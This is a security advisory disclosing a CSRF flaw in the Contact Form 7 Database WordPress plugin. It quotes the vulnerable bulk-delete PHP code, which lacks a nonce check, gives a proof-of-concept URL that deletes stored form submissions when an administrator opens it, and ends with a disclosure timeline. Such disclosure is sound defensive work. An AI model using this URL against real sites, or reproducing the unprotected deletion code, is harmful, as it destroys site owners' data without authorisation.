03 Apr

Cross-Site Request Forgery (CSRF)/Form Submission Deletion Vulnerability in Contact Form 7 Database

While looking over another vulnerability in the plugin Contact Form 7 Database we also noticed that it lacked protection against cross-site request forgery (CSRF) when deleting the form submissions that it stores.

The following code in the file /admin/table.php handles processing requests to delete form submissions:

129
130
131
132
133
134
135
136
137
138
// If the delete bulk action is triggered
if ((isset($_POST['action']) && $_POST['action'] == 'bulk-delete')
   || (isset($_POST['action2']) && $_POST['action2'] == 'bulk-delete')
) {
    $delete_ids = esc_sql($_POST['bulk-delete']);
 
// loop over the array of record IDs and delete them
foreach ($delete_ids as $id) {
    $this->delete_entry($id);
}

The code doesn’t check for a valid nonce, which is used to prevent CSRF.

Proof of Concept

The following proof of concept will delete the form submissions with the ID 1 and 2, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

http://[path to WordPress]/wp-admin/admin.php?page=cf7-data&action=-1&cf7d-export=-1&del_id%5B%5D=1&del_id%5B%5D=2&action2=delete&btn_apply2=Apply

Timeline

  • March 27, 2017 – Developer notified.
  • April 3, 2017 – WordPress.org Plugin Directory notified.
  • April 3, 2017 – Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of The Plugins You Use

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *